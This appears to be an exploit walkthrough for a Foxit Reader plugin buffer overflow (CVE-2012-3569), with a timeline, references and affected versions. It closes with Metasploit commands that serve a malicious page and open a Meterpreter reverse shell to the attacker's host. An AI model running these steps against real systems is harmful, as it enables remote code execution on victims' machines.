Timeline :

Vulnerability discovered by rgod the 2013-01-07
Vendor public release of the vulnerability the 2013-01-14
Metasploit PoC provided the 2013-02-12

PoC provided by :

rgod
Sven Krewitt
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin

Affected version(s) :

Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier

Tested on Windows 7 Integral SP1 with :

Firefox 18.0.2
Foxit Reader version 5.4.4.11281

Description :

This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

Commands :

use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo